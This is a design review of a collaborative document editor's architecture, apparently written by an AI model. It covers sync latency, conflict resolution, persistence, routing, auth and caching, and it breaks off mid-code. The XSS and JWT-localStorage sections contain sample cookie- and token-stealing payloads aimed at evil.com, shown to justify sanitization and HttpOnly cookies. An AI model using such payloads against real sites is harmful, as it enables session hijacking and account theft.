Here's the architecture for a real-time collaborative document editor (like Google Docs):
**System Overview:**
- Frontend: React SPA with WebSocket connections
- Backend: Node.js API servers behind a load balancer (round-robin)
- Database: PostgreSQL for document storage, Redis for session cache
- Real-time: Each API server maintains its own WebSocket connections to clients
- Sync Strategy: Last-write-wins with timestamps from client clocks
- Storage: Documents saved as full HTML snapshots every 30 seconds
- Auth: JWT tokens with 24-hour expiry, stored in localStorage
- CDN: CloudFront for static assets, also caches API responses for 5 minutes
**Data Flow:**
1. User types → change event sent via WebSocket to their connected server
2. Server writes change to PostgreSQL
3. Server broadcasts change to all WebSocket clients connected to THAT server
4. Other servers poll PostgreSQL every 2 seconds for changes
5. Conflict resolution: if two users edit the same paragraph, last timestamp wins
**Scaling Plan:**
- Horizontal scaling by adding more API servers
- Database read replicas for read-heavy operations
- Document partitioning by organization ID
Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
This architecture has several critical flaws that would cause data loss, inconsistency, and poor user experience at scale. I'll work through every layer systematically.
**1.1 Two-Second Cross-Server Delay**
The Flaw: Each API server only broadcasts changes to its own WebSocket clients. Other servers discover changes by polling PostgreSQL every 2 seconds.
Timeline showing the problem:
Server A (Alice connected)               Server B (Bob connected)
─────────────────────────────────        ─────────────────────────────────
t=0.0s  Alice types "Hello"
t=0.0s  Broadcast to Server A clients ✓
t=0.0s  Write to PostgreSQL
                                         t=0.1s  Bob types "World"
                                         t=0.1s  Broadcast to Server B clients ✓
                                         t=0.1s  Write to PostgreSQL
        ... silence ...                          ... silence ...
t=2.0s  Poll PostgreSQL                  t=2.0s  Poll PostgreSQL
        → discovers "World"                      → discovers "Hello"
        → broadcasts to Alice                    → broadcasts to Bob
Result: 2-SECOND LATENCY for cross-server collaboration.
That's completely unacceptable for real-time editing.
The Solution: Dedicated pub/sub layer for inter-server communication.
┌──────────┐ WebSocket ┌────────────┐
│ Alice │◄──────────────────►│ Server A │
└──────────┘ └─────┬──────┘
│ PUBLISH "doc:123"
▼
┌────────────┐
│ Redis │
│ Pub/Sub │
└─────┬──────┘
│ SUBSCRIBE "doc:123"
▼
┌──────────┐ WebSocket ┌────────────┐
│ Bob │◄──────────────────►│ Server B │
└──────────┘ └────────────┘
// Server-side: publish changes to all servers via Redis Pub/Sub
const Redis = require('ioredis');
const pub = new Redis(REDIS_URL);
const sub = new Redis(REDIS_URL);
// When a change arrives via WebSocket from a client
async function handleClientChange(change, documentId, serverId) {
// 1. Persist to database
await persistChange(change);
// 2. Broadcast to local WebSocket clients (immediate, <10ms)
broadcastToLocalClients(documentId, change);
// 3. Publish to Redis so OTHER servers get it immediately
await pub.publish(`doc:${documentId}`, JSON.stringify({
change,
originServer: serverId, // so we can avoid echo
timestamp: Date.now()
}));
}
// Every server subscribes to channels for documents with active editors
sub.on('message', (channel, message) => {
const { change, originServer } = JSON.parse(message);
// Don't re-broadcast changes that originated from this server
if (originServer === MY_SERVER_ID) return;
const documentId = channel.replace('doc:', '');
broadcastToLocalClients(documentId, change);
});
// Subscribe when a client opens a document
function onClientOpensDocument(documentId) {
sub.subscribe(`doc:${documentId}`);
}
Trade-offs:
**1.2 Last-Write-Wins Destroys Data**
The Flaw: This is the most damaging design choice in the entire architecture. With last-write-wins at the paragraph level, concurrent edits cause silent data loss.
Scenario: Alice and Bob both edit the same paragraph simultaneously.
Original paragraph: "The quick brown fox"
Alice (t=100): "The quick brown fox jumps over the lazy dog"
(added " jumps over the lazy dog")
Bob (t=101): "The slow brown fox"
(changed "quick" to "slow")
Last-write-wins result: "The slow brown fox"
Alice's addition is SILENTLY DELETED. No warning. No merge. Just gone.
The Solution: Operational Transformation (OT) or CRDTs.
For a Google Docs-style editor, OT is the proven approach. Here's the conceptual implementation:
// Each change is expressed as an operation, not a state snapshot
// Operations are: retain(n), insert(text), delete(n)
// Alice's operation on "The quick brown fox" (length 19):
const aliceOp = [
retain(19), // keep everything
insert(" jumps over the lazy dog") // append
];
// Bob's operation on "The quick brown fox" (length 19):
const bobOp = [
retain(4), // keep "The "
delete(5), // remove "quick"
insert("slow"), // insert "slow"
retain(10) // keep " brown fox"
];
// The OT transform function computes compatible operations
const [alicePrime, bobPrime] = transform(aliceOp, bobOp);
// Applying both transformed operations yields:
// "The slow brown fox jumps over the lazy dog"
// BOTH edits are preserved!
// Server-side OT engine
class DocumentOTEngine {
constructor(documentId) {
this.documentId = documentId;
this.revision = 0; // monotonically increasing server revision
this.operationLog = []; // ordered list of all operations
}
/**
* Client sends: { revision: clientRev, operation: op }
* clientRev = the server revision the client's op was based on
*/
async receiveOperation(clientRevision, operation, userId) {
// Transform against all operations that happened since
// the client's known revision
let transformedOp = operation;
for (let i = clientRevision; i < this.revision; i++) {
const serverOp = this.operationLog[i];
// Transform client op against each concurrent server op
[transformedOp] = transform(transformedOp, serverOp);
}
// Apply the transformed operation to the server document
this.document = apply(this.document, transformedOp);
this.operationLog.push(transformedOp);
this.revision++;
// Persist and broadcast
await this.persist(transformedOp);
this.broadcast(transformedOp, userId);
// Send acknowledgment to the original client
return { revision: this.revision };
}
}
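The transform and apply helpers above are assumed rather than shown (in practice they would come from an OT library). As a minimal illustration, here is a sketch of apply for the retain/insert/delete model used in these examples; the component object shape is an assumption:
// Minimal apply() sketch, assuming components shaped like
// { type: 'retain', n }, { type: 'insert', text }, { type: 'delete', n }.
function apply(doc, operation) {
  let result = '';
  let cursor = 0; // read position in the original document
  for (const c of operation) {
    if (c.type === 'retain') {
      result += doc.slice(cursor, cursor + c.n);
      cursor += c.n;
    } else if (c.type === 'insert') {
      result += c.text;   // inserted text consumes no input
    } else if (c.type === 'delete') {
      cursor += c.n;      // skip the deleted text in the input
    }
  }
  return result + doc.slice(cursor); // keep any trailing, untouched text
}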
Trade-offs:
- OT transform logic is notoriously hard to get right; use a battle-tested library (e.g., ot.js or ShareDB) rather than implementing it from scratch.
**1.3 Client Clock Timestamps**
The Flaw: Conflict resolution relies on client-side timestamps. Client clocks are arbitrary.
Alice's laptop clock: 2024-01-15 14:00:00 (correct)
Bob's laptop clock: 2024-01-15 09:00:00 (5 hours behind)
Bob's edits will ALWAYS lose to Alice's, even if Bob edited later.
Worse: a malicious user could set their clock to year 2030
and their edits would always win.
The Solution: Use server-assigned logical ordering.
// Every operation gets a server-side revision number
// This is the OT approach from 1.2, but even without OT:
class DocumentRevisionManager {
// Use a PostgreSQL sequence or Redis INCR for atomic ordering
async assignRevision(documentId, operation) {
// INCR is atomic in Redis — no two operations get the same number
const revision = await redis.incr(`doc:${documentId}:revision`);
return {
...operation,
revision, // server-assigned order
serverTimestamp: Date.now(), // server clock, not client
// client timestamp kept only for analytics, never for ordering
clientTimestamp: operation.clientTimestamp
};
}
}
Trade-offs:
**2.1 30-Second Snapshot Data Loss**
The Flaw: Documents are saved as full HTML snapshots every 30 seconds. If a server crashes, up to 30 seconds of all active users' work is lost.
t=0s Snapshot saved
t=5s Alice types a paragraph
t=15s Bob adds a table
t=25s Carol writes three paragraphs
t=29s SERVER CRASHES
─────────────────
All work from t=0s to t=29s is GONE.
Three users just lost their work simultaneously.
The Solution: Event-sourced operation log with periodic snapshots for fast loading.
// Every individual operation is persisted immediately
// Snapshots are just an optimization for fast document loading
// PostgreSQL schema
const schema = `
-- The operation log is the source of truth
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL, -- the OT operation
user_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision) -- enforces operation ordering
);
-- Snapshots are a materialized optimization, not the source of truth
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
revision INTEGER NOT NULL, -- snapshot is valid AT this revision
content JSONB NOT NULL, -- full document state
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY(document_id, revision)
);
-- Index for fast "give me ops since revision X" queries
CREATE INDEX idx_ops_doc_revision
ON document_operations(document_id, revision);
`;
// Loading a document: snapshot + replay
async function loadDocument(documentId) {
  // 1. Get the latest snapshot (fall back to an empty document if none exists yet;
  //    emptyDocument() is a placeholder for a blank structured document)
  const snapshotResult = await db.query(`
    SELECT content, revision FROM document_snapshots
    WHERE document_id = $1
    ORDER BY revision DESC LIMIT 1
  `, [documentId]);
  const snapshot = snapshotResult.rows[0] || { content: emptyDocument(), revision: 0 };
  // 2. Get all operations AFTER the snapshot
  const opsResult = await db.query(`
    SELECT operation FROM document_operations
    WHERE document_id = $1 AND revision > $2
    ORDER BY revision ASC
  `, [documentId, snapshot.revision]);
  // 3. Replay operations on top of the snapshot
  let document = snapshot.content;
  for (const op of opsResult.rows) {
    document = applyOperation(document, op.operation);
  }
  return { document, revision: snapshot.revision + opsResult.rows.length };
}
// Background job: create snapshots periodically to bound replay cost
async function createSnapshot(documentId) {
const { document, revision } = await loadDocument(documentId);
await db.query(`
INSERT INTO document_snapshots (document_id, revision, content)
VALUES ($1, $2, $3)
ON CONFLICT DO NOTHING
`, [documentId, revision, document]);
}
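How often to snapshot is left open above. One simple policy, sketched here with the threshold as an assumption, is to snapshot a document once it has accumulated a fixed number of operations since its last snapshot:
// Sketch: snapshot once a document has N un-snapshotted operations.
// The threshold and this trigger policy are assumptions, not requirements.
const SNAPSHOT_EVERY_N_OPS = 500;

async function maybeSnapshot(documentId) {
  const snap = await db.query(`
    SELECT COALESCE(MAX(revision), 0) AS rev
    FROM document_snapshots WHERE document_id = $1
  `, [documentId]);
  const head = await db.query(`
    SELECT COALESCE(MAX(revision), 0) AS rev
    FROM document_operations WHERE document_id = $1
  `, [documentId]);
  if (head.rows[0].rev - snap.rows[0].rev >= SNAPSHOT_EVERY_N_OPS) {
    await createSnapshot(documentId); // from the function above
  }
}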
Trade-offs:
**2.2 HTML Snapshot Bloat and XSS**
The Flaw: Storing documents as "full HTML snapshots" creates multiple problems:
Problems with raw HTML storage:
1. XSS VULNERABILITY:
User pastes: <img src=x onerror="fetch('evil.com/steal?cookie='+document.cookie)">
If stored as raw HTML and rendered, every viewer gets compromised.
2. BLOAT:
A 1-page document in HTML: ~50KB
Same content in structured JSON: ~5KB
With 30-second snapshots × millions of documents = massive storage
3. NO STRUCTURED OPERATIONS:
You can't diff two HTML snapshots to figure out what changed.
You can't do OT on raw HTML.
You can't build features like "show me what Bob changed."
The Solution: Use a structured document model (like ProseMirror/Tiptap's JSON schema).
// Instead of: "<h1>Title</h1><p>Hello <strong>world</strong></p>"
// Store:
const documentStructure = {
type: "doc",
content: [
{
type: "heading",
attrs: { level: 1 },
content: [{ type: "text", text: "Title" }]
},
{
type: "paragraph",
content: [
{ type: "text", text: "Hello " },
{ type: "text", text: "world", marks: [{ type: "bold" }] }
]
}
]
};
// This structured format:
// ✓ Can be validated against a schema (no XSS)
// ✓ Can be diffed structurally
// ✓ Can have OT operations applied to it
// ✓ Is ~60-80% smaller than equivalent HTML
// ✓ Can be rendered to HTML, Markdown, PDF, etc.
// Sanitization on output (defense in depth), using the sanitize-html package
const sanitizeHtml = require('sanitize-html');

function renderToHTML(doc) {
  // Even with structured storage, sanitize on render
  return sanitizeHtml(structuredToHtml(doc), {
    allowedTags: ['h1','h2','h3','p','strong','em','a','ul','ol','li','table'],
    allowedAttributes: { 'a': ['href'] }
  });
}
**2.3 PostgreSQL Write Bottleneck**
The Flaw: Every keystroke from every user results in a write to PostgreSQL. PostgreSQL is excellent, but it's not designed for the write pattern of "millions of tiny inserts per second with immediate consistency requirements."
Back-of-napkin math:
- 100,000 concurrent users
- Average 3 operations/second per user (typing)
- = 300,000 writes/second to PostgreSQL
- Each write needs to be durable (fsync) for data safety
- PostgreSQL on good hardware: ~50,000-100,000 TPS
You're 3-6x over capacity.
The Solution: Multi-tier write strategy.
// Tier 1: Redis Streams for immediate durability + ordering (microseconds)
// Tier 2: Async drain from Redis to PostgreSQL (batched, milliseconds)
const Redis = require('ioredis');
const redis = new Redis(REDIS_URL);
// When an operation arrives, write to Redis Stream (very fast, persistent)
async function persistOperation(documentId, operation) {
// XADD is O(1) and Redis Streams are persistent (AOF)
const streamId = await redis.xadd(
`ops:${documentId}`,
'*', // auto-generate ID
'op', JSON.stringify(operation)
);
// Also publish for real-time broadcast (from section 1.1)
await redis.publish(`doc:${documentId}`, JSON.stringify(operation));
return streamId;
}
// Background worker: drain Redis Streams to PostgreSQL in batches
// (assumes the 'pg-writer' consumer group has been created with XGROUP CREATE,
// and a getActiveDocumentStreams() helper returns the stream keys this worker owns)
async function drainToPostgres() {
  while (true) {
    const streamKeys = await getActiveDocumentStreams();
    if (streamKeys.length === 0) { await sleep(1000); continue; }
    // Read up to 100 new entries per active document stream;
    // '>' means "entries not yet delivered to this consumer group"
    const streams = await redis.xreadgroup(
      'GROUP', 'pg-writer', 'worker-1',
      'COUNT', 100,
      'BLOCK', 1000, // wait up to 1s for new data
      'STREAMS', ...streamKeys, ...streamKeys.map(() => '>')
    );
    if (!streams) continue;
    // Batch insert into PostgreSQL with parameterized values (no string interpolation)
    const ops = streams.flatMap(([stream, entries]) =>
      entries.map(([id, fields]) => JSON.parse(fields[1])) // fields = ['op', '<json>']
    );
    const params = [];
    const placeholders = ops.map((op, i) => {
      params.push(op.documentId, op.revision, JSON.stringify(op));
      return `($${i * 3 + 1}, $${i * 3 + 2}, $${i * 3 + 3}::jsonb)`;
    });
    await db.query(`
      INSERT INTO document_operations (document_id, revision, operation)
      VALUES ${placeholders.join(',')}
    `, params);
    // Acknowledge processed entries so the group doesn't redeliver them
    for (const [stream, entries] of streams) {
      await redis.xack(stream, 'pg-writer', ...entries.map(e => e[0]));
    }
  }
}
Trade-offs:
**3.1 Split-Brain Document Routing**
The Flaw: OT requires serialized processing of operations per document. If 500 users are editing the same document, all operations must be processed sequentially by one entity. With round-robin load balancing, operations for the same document scatter across all servers.
Round-robin distributes users randomly:
Server 1: Alice (doc A), Dave (doc B), Grace (doc A)
Server 2: Bob (doc A), Eve (doc C), Heidi (doc A)
Server 3: Carol (doc A), Frank (doc B), Ivan (doc A)
Document A's operations arrive at 3 different servers.
Who serializes them? Who runs the OT engine?
Every server would need to coordinate via distributed locking. Nightmare.
The Solution: Sticky routing — all connections for a document go to the same server.
# Nginx/HAProxy: route by document ID, not round-robin
upstream api_servers {
# Consistent hashing by document ID
hash $arg_documentId consistent;
server api-1:3000;
server api-2:3000;
server api-3:3000;
}
# WebSocket upgrade with document-based routing
map $args $document_id {
~documentId=(?<did>[^&]+) $did;
}
server {
location /ws {
proxy_pass http://api_servers;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Sticky routing: same document always goes to same server
# Consistent hashing means adding/removing servers only
# remaps ~1/N of documents
}
}
// Server-side: each server is the authoritative OT engine
// for its assigned documents
class Server {
constructor() {
// In-memory OT engines only for documents assigned to THIS server
this.documentEngines = new Map();
}
getOrCreateEngine(documentId) {
if (!this.documentEngines.has(documentId)) {
const engine = new DocumentOTEngine(documentId);
// Load current state from database
engine.initialize();
this.documentEngines.set(documentId, engine);
}
return this.documentEngines.get(documentId);
}
async handleOperation(documentId, clientRevision, operation) {
const engine = this.getOrCreateEngine(documentId);
// Serialized per-document via the single engine instance
// Node.js single-threaded event loop helps here!
return engine.receiveOperation(clientRevision, operation);
}
}
Trade-offs:
**3.2 Read Replica Staleness**
The Flaw: PostgreSQL read replicas have replication lag (typically 10ms-1s, but it can spike to minutes under load). If a user writes to the primary and then reads from a replica, they may not see their own changes.
t=0ms User saves document title → write goes to PRIMARY
t=5ms User's browser requests document list → read goes to REPLICA
Replica hasn't received the write yet
User doesn't see their new title → "Where did my change go?!"
The Solution: Read-your-own-writes consistency.
// Track the last write position per user session
class ConsistentReader {
// After any write, store the PostgreSQL WAL position
async afterWrite(userId) {
const result = await primaryDb.query(
'SELECT pg_current_wal_lsn() as lsn'
);
await redis.set(
`user:${userId}:last_write_lsn`,
result.rows[0].lsn,
'EX', 30 // expire after 30 seconds
);
}
// Before any read, check if the replica has caught up
async getReadConnection(userId) {
const lastWriteLsn = await redis.get(`user:${userId}:last_write_lsn`);
if (!lastWriteLsn) {
// No recent writes — replica is fine
return replicaDb;
}
// Check if replica has caught up to the user's last write
const result = await replicaDb.query(
'SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn as caught_up',
[lastWriteLsn]
);
if (result.rows[0].caught_up) {
return replicaDb;
}
// Replica hasn't caught up — read from primary
return primaryDb;
}
}
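A sketch of how this could be wired into request handlers; the Express routes, table columns, and req.user population here are assumptions:
// Hypothetical usage: choose the connection per request based on the
// user's most recent write position.
const consistentReader = new ConsistentReader();

app.get('/api/documents', async (req, res) => {
  const conn = await consistentReader.getReadConnection(req.user.id);
  const result = await conn.query(
    'SELECT id, title, updated_at FROM documents WHERE owner_id = $1',
    [req.user.id]
  );
  res.json(result.rows);
});

app.put('/api/documents/:id/title', async (req, res) => {
  await primaryDb.query(
    'UPDATE documents SET title = $1 WHERE id = $2',
    [req.body.title, req.params.id]
  );
  // Record the WAL position so the user's subsequent reads see this write
  await consistentReader.afterWrite(req.user.id);
  res.sendStatus(204);
});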
Trade-offs:
**3.3 Organization-Based Hot Spots**
The Flaw: Partitioning by organization ID means one large organization's data all lives on one partition. If Google (500,000 employees) uses your tool, that partition is 1000x larger than a 50-person startup's partition.
Partition 1: ["TinyStartup LLC"] → 200 documents
Partition 2: ["MegaCorp Inc."] → 5,000,000 documents
Partition 3: ["SmallAgency Co."] → 500 documents
Partition 2 is a massive hot spot.
The Solution: Hash-based partitioning on document ID, with organization as a secondary index.
-- Partition by hash of document_id (even distribution guaranteed)
CREATE TABLE document_operations (
id BIGSERIAL,
document_id UUID NOT NULL,
org_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW()
) PARTITION BY HASH (document_id);
-- Create partitions (e.g., 16 partitions)
CREATE TABLE document_operations_p0
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 0);
CREATE TABLE document_operations_p1
PARTITION OF document_operations FOR VALUES WITH (MODULUS 16, REMAINDER 1);
-- ... through p15
-- Organization-level queries use an index, not the partition key
CREATE INDEX idx_ops_org ON document_operations (org_id, created_at);
Trade-offs:
**4.1 JWT in localStorage (XSS Exposure)**
The Flaw: JWTs stored in localStorage are accessible to any JavaScript running on the page. A single XSS vulnerability (including from third-party scripts) exposes every user's session.
// Any XSS payload can steal the token:
fetch('https://evil.com/steal', {
method: 'POST',
body: JSON.stringify({
token: localStorage.getItem('auth_token'),
// Attacker now has a 24-hour valid session
// They can read/modify ALL of the user's documents
})
});
The Solution: HttpOnly cookies with proper security attributes.
// Server: set JWT as HttpOnly cookie (JavaScript cannot access it)
function setAuthCookie(res, token) {
res.cookie('session', token, {
httpOnly: true, // JavaScript cannot read this cookie
secure: true, // only sent over HTTPS
sameSite: 'strict', // not sent on cross-origin requests (CSRF protection)
maxAge: 24 * 60 * 60 * 1000, // 24 hours
path: '/',
domain: '.yourdomain.com'
});
}
// For WebSocket auth (cookies are sent on WS handshake):
const WebSocket = require('ws');
const wss = new WebSocket.Server({ noServer: true });
server.on('upgrade', (request, socket, head) => {
// Parse cookie from the upgrade request headers
const cookies = parseCookies(request.headers.cookie);
const token = cookies.session;
try {
const user = jwt.verify(token, JWT_SECRET);
wss.handleUpgrade(request, socket, head, (ws) => {
ws.user = user;
wss.emit('connection', ws, request);
});
} catch (err) {
socket.write('HTTP/1.1 401 Unauthorized\r\n\r\n');
socket.destroy();
}
});
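The parseCookies helper above is assumed; a minimal sketch (in practice the npm cookie package's parse() is the safer choice):
// Minimal sketch of the parseCookies() helper used above.
function parseCookies(cookieHeader = '') {
  const cookies = {};
  for (const pair of cookieHeader.split(';')) {
    const index = pair.indexOf('=');
    if (index === -1) continue;
    const name = pair.slice(0, index).trim();
    cookies[name] = decodeURIComponent(pair.slice(index + 1).trim());
  }
  return cookies;
}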
Trade-offs:
**4.2 No JWT Revocation**
The Flaw: If a user's token is compromised, or they're fired/deactivated, the token remains valid for up to 24 hours. JWTs are stateless — there's no server-side way to invalidate them without additional infrastructure.
t=0h Employee gets JWT (expires t=24h)
t=1h Employee is terminated, account deactivated
t=1h-24h Terminated employee still has full access
Can download/modify/delete all documents they had access to
The Solution: Short-lived access tokens + refresh token rotation + server-side deny list.
// Token strategy:
// - Access token: 15-minute expiry (short-lived, used for API calls)
// - Refresh token: 7-day expiry (stored in HttpOnly cookie, used to get new access tokens)
async function issueTokens(user) {
  const jti = uuid();          // unique access-token ID, checked against the deny list
  const tokenFamily = uuid();  // groups refresh tokens issued from the same login
  const accessToken = jwt.sign(
    { userId: user.id, role: user.role, jti },
    ACCESS_SECRET,
    { expiresIn: '15m' }
  );
  const refreshToken = jwt.sign(
    { userId: user.id, tokenFamily },
    REFRESH_SECRET,
    { expiresIn: '7d' }
  );
  // Track the user's active access-token IDs so they can be revoked in bulk
  // (one simple bookkeeping approach: a short-lived Redis set per user)
  await redis.sadd(`user:${user.id}:jtis`, jti);
  await redis.expire(`user:${user.id}:jtis`, 24 * 60 * 60);
  // Store refresh token hash in database for revocation
  await db.query(`
    INSERT INTO refresh_tokens (user_id, token_hash, family, expires_at)
    VALUES ($1, $2, $3, NOW() + INTERVAL '7 days')
  `, [user.id, hash(refreshToken), tokenFamily]);
  return { accessToken, refreshToken };
}
// Fast revocation check using Redis (checked on every request)
async function isTokenRevoked(jti) {
  return (await redis.sismember('revoked_tokens', jti)) === 1;
}
// When a user is deactivated: revoke all their tokens
async function deactivateUser(userId) {
  // Add all of the user's active access-token IDs to the deny list
  const activeTokenIds = await redis.smembers(`user:${userId}:jtis`);
  if (activeTokenIds.length > 0) {
    await redis.sadd('revoked_tokens', ...activeTokenIds);
  }
  // Delete all refresh tokens so no new access tokens can be issued
  await db.query('DELETE FROM refresh_tokens WHERE user_id = $1', [userId]);
}
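A sketch of how the per-request revocation check might be wired in as Express middleware; the route wiring, cookie-parser usage, and names here are assumptions:
// Hypothetical middleware: verify the access token from the session cookie
// and reject tokens on the deny list. Assumes cookie-parser populates req.cookies.
async function requireAuth(req, res, next) {
  try {
    const payload = jwt.verify(req.cookies.session, ACCESS_SECRET);
    if (await isTokenRevoked(payload.jti)) {
      return res.status(401).json({ error: 'TOKEN_REVOKED' });
    }
    req.user = { id: payload.userId, role: payload.role };
    next();
  } catch (err) {
    res.status(401).json({ error: 'INVALID_TOKEN' });
  }
}
app.use('/api', requireAuth);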
Trade-offs:
**4.3 No Document Authorization**
The Flaw: The architecture describes authentication (JWT) but not authorization. Once authenticated, can any user open a WebSocket to any document? Every incoming operation must be checked.
// VULNERABLE: no authorization check
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Anyone can send operations to any document!
await handleOperation(documentId, operation);
});
The Solution: Per-document permission checks on every operation.
// Permission model
const PERMISSIONS = {
OWNER: ['read', 'write', 'share', 'delete'],
EDITOR: ['read', 'write'],
COMMENTER: ['read', 'comment'],
VIEWER: ['read']
};
// Check on WebSocket connection AND on every message
ws.on('message', async (data) => {
const { documentId, operation } = JSON.parse(data);
// Check permission (cached in Redis for performance)
const permission = await getPermission(ws.user.id, documentId);
if (!permission || !PERMISSIONS[permission].includes('write')) {
ws.send(JSON.stringify({
error: 'FORBIDDEN',
message: 'You do not have write access to this document'
}));
return;
}
await handleOperation(documentId, operation, ws.user);
});
// Cache permissions in Redis (invalidate on share/unshare)
async function getPermission(userId, documentId) {
const cacheKey = `perm:${userId}:${documentId}`;
let permission = await redis.get(cacheKey);
if (!permission) {
const result = await db.query(`
SELECT role FROM document_permissions
WHERE user_id = $1 AND document_id = $2
`, [userId, documentId]);
permission = result.rows[0]?.role || 'NONE';
await redis.set(cacheKey, permission, 'EX', 300); // cache 5 min
}
return permission === 'NONE' ? null : permission;
}
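The "invalidate on share/unshare" comment above implies a write path like the following sketch; the table name, unique constraint, and function names are assumptions:
// Hypothetical share/unshare handlers that keep the Redis permission cache honest.
// Assumes a UNIQUE constraint on (document_id, user_id).
async function shareDocument(documentId, userId, role) {
  await db.query(`
    INSERT INTO document_permissions (document_id, user_id, role)
    VALUES ($1, $2, $3)
    ON CONFLICT (document_id, user_id) DO UPDATE SET role = EXCLUDED.role
  `, [documentId, userId, role]);
  await redis.del(`perm:${userId}:${documentId}`); // drop the stale cache entry
}

async function unshareDocument(documentId, userId) {
  await db.query(`
    DELETE FROM document_permissions WHERE document_id = $1 AND user_id = $2
  `, [documentId, userId]);
  await redis.del(`perm:${userId}:${documentId}`);
}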
**5.1 CDN Caching of API Responses**
The Flaw: CloudFront caching API responses for 5 minutes is extremely dangerous for a collaborative editor. Users will see stale document lists, stale permissions, and stale content.
Scenario:
t=0:00 Alice shares document with Bob → API returns "shared" status
CloudFront caches this response
t=0:30 Alice REVOKES Bob's access → API returns "not shared"
But CloudFront still has the old cached response
t=0:30-5:00 Bob's browser still gets the cached "shared" response
Bob can still see and potentially access the document
for up to 5 more minutes after access was revoked
The Solution: Separate caching strategies by content type.
// CDN configuration: NEVER cache authenticated API responses
// Only cache static assets and truly public content
// CloudFront behavior configurations:
const cloudFrontBehaviors = {
// Static assets: aggressive caching
'/static/*': {
cachePolicyId: 'CachingOptimized', // cache forever, bust with filename hash
ttl: { default: 86400, max: 31536000 },
compress: true
},
// Public marketing pages: moderate caching
'/public/*': {
cachePolicyId: 'CachingOptimized',
ttl: { default: 300 }, // 5 min is fine for public content
},
// API endpoints: NO CDN CACHING
'/api/*': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer', // forward all headers
// Let the application server set its own Cache-Control headers
},
// WebSocket: pass through entirely
'/ws': {
cachePolicyId: 'CachingDisabled',
originRequestPolicyId: 'AllViewer',
}
};
// Application-level caching headers (set by the API server)
app.get('/api/documents', (req, res) => {
res.set({
'Cache-Control': 'private, no-store', // never cache user-specific data
'Vary': 'Authorization, Cookie'
});
// ... return documents
});
app.get('/api/documents/:id/content', (req, res) => {
// Document content changes constantly in a collaborative editor
res.set('Cache-Control', 'no-store');
// ... return content
});
Trade-offs:
**6.1 No Reconnection Handling**
The Flaw: The architecture doesn't address what happens when a WebSocket connection drops (network switch, laptop sleep, mobile network change). Without explicit handling, users will type into a disconnected editor and lose everything.
The Solution: Client-side operation buffering with automatic reconnection.
class ResilientDocumentConnection {
constructor(documentId) {
this.documentId = documentId;
this.pendingOps = []; // operations not yet acknowledged by server
this.bufferedOps = []; // operations created while disconnected
this.serverRevision = 0;
this.state = 'disconnected'; // disconnected | connecting | synchronized
this.reconnectAttempt = 0;
}
connect() {
this.state = 'connecting';
this.ws = new WebSocket(
`wss://api.example.com/ws?documentId=${this.documentId}`
);
this.ws.onopen = () => {
this.state = 'synchronized';
this.reconnectAttempt = 0;
// Send any operations that were buffered while offline
for (const op of this.bufferedOps) {
this.sendOperation(op);
}
this.bufferedOps = [];
};
this.ws.onclose = (event) => {
this.state = 'disconnected';
this.scheduleReconnect();
};
this.ws.onerror = () => {
// onclose will fire after onerror
};
this.ws.onmessage = (event) => {
this.handleServerMessage(JSON.parse(event.data));
};
}
// User makes an edit
applyLocalOperation(operation) {
// Always apply locally immediately (optimistic)
this.editor.apply(operation);
if (this.state === 'synchronized') {
this.sendOperation(operation);
} else {
// Buffer for later — user can keep typing offline
this.bufferedOps.push(operation);
this.showOfflineIndicator();
}
}
scheduleReconnect() {
// Exponential backoff with jitter
const baseDelay = Math.min(1000 * Math.pow(2, this.reconnectAttempt), 30000);
const jitter = baseDelay * 0.5 * Math.random();
const delay = baseDelay + jitter;
this.reconnectAttempt++;
console.log(`Reconnecting in ${Math.round(delay)}ms (attempt ${this.reconnectAttempt})`);
setTimeout(() => this.connect(), delay);
}
showOfflineIndicator() {
// Show yellow "offline — changes will sync when reconnected" banner
// Users MUST know their changes aren't saved yet
document.getElementById('sync-status').className = 'offline';
}
}
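The sendOperation and handleServerMessage methods (and the pendingOps acknowledgment flow) are not shown above; a minimal sketch of one way they could look, with the wire format as an assumption:
// Sketch of the two helpers used above, added onto the class for illustration.
// The message shapes ({ type, revision, operation }) are assumptions.
ResilientDocumentConnection.prototype.sendOperation = function (operation) {
  // Track the op until the server acknowledges it with a new revision
  this.pendingOps.push(operation);
  this.ws.send(JSON.stringify({
    type: 'operation',
    documentId: this.documentId,
    revision: this.serverRevision, // revision this op was based on
    operation
  }));
};

ResilientDocumentConnection.prototype.handleServerMessage = function (message) {
  if (message.type === 'ack') {
    // Our own op was accepted: drop it from the pending queue
    this.pendingOps.shift();
    this.serverRevision = message.revision;
  } else if (message.type === 'remote-op') {
    // Another user's op: advance the revision and apply it to the local editor
    this.serverRevision = message.revision;
    this.editor.apply(message.operation);
  }
};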
Trade-offs:
**6.2 WebSocket Memory Leaks**
The Flaw: Long-lived WebSocket connections accumulate state. Without proper cleanup, servers leak memory from abandoned connections, dead subscriptions, and orphaned OT engine instances.
// Common leak patterns:
// LEAK 1: Client closes browser without clean disconnect
// The TCP connection may stay "open" on the server for minutes
// LEAK 2: OT engines for documents that no one is editing anymore
// stay in memory indefinitely
// LEAK 3: Redis pub/sub subscriptions for documents never unsubscribed
The Solution: Heartbeat monitoring + resource lifecycle management.
class ConnectionManager {
constructor() {
this.connections = new Map(); // ws → metadata
this.documentSubscribers = new Map(); // documentId → Set<ws>
}
addConnection(ws, user, documentId) {
ws.isAlive = true;
ws.documentId = documentId;
this.connections.set(ws, {
user,
documentId,
connectedAt: Date.now(),
lastActivity: Date.now()
});
// Track subscribers per document
if (!this.documentSubscribers.has(documentId)) {
this.documentSubscribers.set(documentId, new Set());
redis.subscribe(`doc:${documentId}`); // subscribe on first user
}
this.documentSubscribers.get(documentId).add(ws);
// Heartbeat: client must respond to pings
